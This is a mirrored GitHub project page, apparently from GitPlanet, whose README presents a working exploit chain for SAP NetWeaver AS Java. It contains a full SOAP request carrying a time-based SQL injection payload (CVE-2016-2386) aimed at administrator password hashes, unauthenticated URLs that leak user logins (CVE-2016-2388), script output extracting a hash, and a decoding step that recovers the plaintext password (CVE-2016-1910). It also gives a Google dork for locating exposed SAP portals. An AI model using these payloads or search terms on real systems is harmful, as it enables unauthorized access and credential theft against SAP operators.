GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → vah13 → Sap_exploit

vah13 / Sap_exploit

Here you can get full exploit for SAP NetWeaver AS JAVA

Programming Languages

python
139335 projects - #7 most used programming language

Labels

exploitvulnerabilitysql-injection

Projects that are alternatives of or similar to Sap exploit

Shiro exploit
Apache Shiro 反序列化漏洞检测与利用工具
Stars: ✭ 252 (+320%)
Mutual labels:  exploit, vulnerability
A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (+536.67%)
Mutual labels:  exploit, vulnerability
Vbscan
OWASP VBScan is a Black Box vBulletin Vulnerability Scanner
Stars: ✭ 295 (+391.67%)
Mutual labels:  exploit, vulnerability
Slowloris
Asynchronous Python implementation of SlowLoris DoS attack
Stars: ✭ 51 (-15%)
Mutual labels:  exploit, vulnerability
Herpaderping
Process Herpaderping proof of concept, tool, and technical deep dive. Process Herpaderping bypasses security products by obscuring the intentions of a process.
Stars: ✭ 614 (+923.33%)
Mutual labels:  exploit, vulnerability
Exploits
Real world and CTFs exploiting web/binary POCs.
Stars: ✭ 69 (+15%)
Mutual labels:  exploit, vulnerability
Iot Vulhub
IoT 固件漏洞复现环境
Stars: ✭ 341 (+468.33%)
Mutual labels:  exploit, vulnerability
Pentesting
Misc. Public Reports of Penetration Testing and Security Audits.
Stars: ✭ 24 (-60%)
Mutual labels:  exploit, vulnerability
Hack Tools
hack tools
Stars: ✭ 488 (+713.33%)
Mutual labels:  exploit, vulnerability
Poc
Proofs-of-concept
Stars: ✭ 467 (+678.33%)
Mutual labels:  exploit, vulnerability
external-protocol-flooding
Scheme flooding vulnerability: how it works and why it is a threat to anonymous browsing
Stars: ✭ 603 (+905%)
Mutual labels:  exploit, vulnerability
Cve 2017 0065
Exploiting Edge's read:// urlhandler
Stars: ✭ 15 (-75%)
Mutual labels:  exploit, vulnerability
Chimay-Red-tiny
This is a minified exploit for mikrotik routers. It does not require any aditional modules to run.
Stars: ✭ 25 (-58.33%)
Mutual labels:  exploit, vulnerability
xsymlink
Xbox One Symbolic Link Exploit: Access restricted/encrypted volumes using the Xbox File Explorer.
Stars: ✭ 18 (-70%)
Mutual labels:  exploit, vulnerability
SQL Injection Payload
SQL Injection Payload List
Stars: ✭ 62 (+3.33%)
Mutual labels:  exploit, vulnerability
Iblessing
iblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis. It can be used for reverse engineering, binary analysis and vulnerability mining.
Stars: ✭ 326 (+443.33%)
Mutual labels:  exploit, vulnerability
sqlinjection-training-app
A simple PHP application to learn SQL Injection detection and exploitation techniques.
Stars: ✭ 56 (-6.67%)
Mutual labels:  exploit, sql-injection
CVE-2021-33766
ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit
Stars: ✭ 37 (-38.33%)
Mutual labels:  exploit, vulnerability
Ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Stars: ✭ 4,808 (+7913.33%)
Mutual labels:  exploit, vulnerability
V3n0m Scanner
Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
Stars: ✭ 847 (+1311.67%)
Mutual labels:  exploit, vulnerability
View All Similar Projects ➔

SAP_exploit

Author: Vahagn Vardanyan https://twitter.com/vah_13

Bugs:

CVE-2016-2386 SQL injection

CVE-2016-2388 Information disclosure

CVE-2016-1910 Crypto issue

Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50

  
    POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
    SOAPAction:
    Content-Type: text/xml;charset=UTF-8
    Host: nw74:50000
    Content-Length: 500

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
	  <soapenv:Header/>
	  <soapenv:Body>
		<sec:deletePermissionById>
		  <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>
		</sec:deletePermissionById>
	  </soapenv:Body>
    </soapenv:Envelope>

In SAP test server I have admin user who login is "Administrator" and so I used this payload

    %PRIVATE_DATASOURCE.un:Administrator%

most SAP's using j2ee_admin username for SAP administrator login

    %PRIVATE_DATASOURCE.un:j2ee_admin%

You can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)

	1)	http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
	2)	http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#

Instead of J2EE_CONFIGENTRY table you can use this tables

        UME_STRINGS_PERM
        UME_STRINGS_ACTN
        BC_DDDBDP
        BC_COMPVERS
        TC_WDRR_MRO_LUT
        TC_WDRR_MRO_FILES
        T_CHUNK                !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection
        T_DOMAIN
        T_SESSION
        UME_ACL_SUP_PERM
        UME_ACL_PERM
        UME_ACL_PERM_MEM

An example of a working exploit

	C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000
	start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit
	this may take a few minutes
	Found {SHA-512, 10000, 24}M
	Found {SHA-512, 10000, 24}MT
	Found {SHA-512, 10000, 24}MTI
	Found {SHA-512, 10000, 24}MTIz
	Found {SHA-512, 10000, 24}MTIzU
	Found {SHA-512, 10000, 24}MTIzUV
	Found {SHA-512, 10000, 24}MTIzUVd
	Found {SHA-512, 10000, 24}MTIzUVdF
	Found {SHA-512, 10000, 24}MTIzUVdFY
	Found {SHA-512, 10000, 24}MTIzUVdFYX
	Found {SHA-512, 10000, 24}MTIzUVdFYXN
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk8
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6
	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X

And finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text

	base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹€ºX

CVE-2016-2386

[PDF whitepaper] https://erpscan.com/wp-content/uploads/2017/12/Hardcore-SAP-Penetration-Testing.pdf

[SAP-Google-Dork] inurl:/irj/portal

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].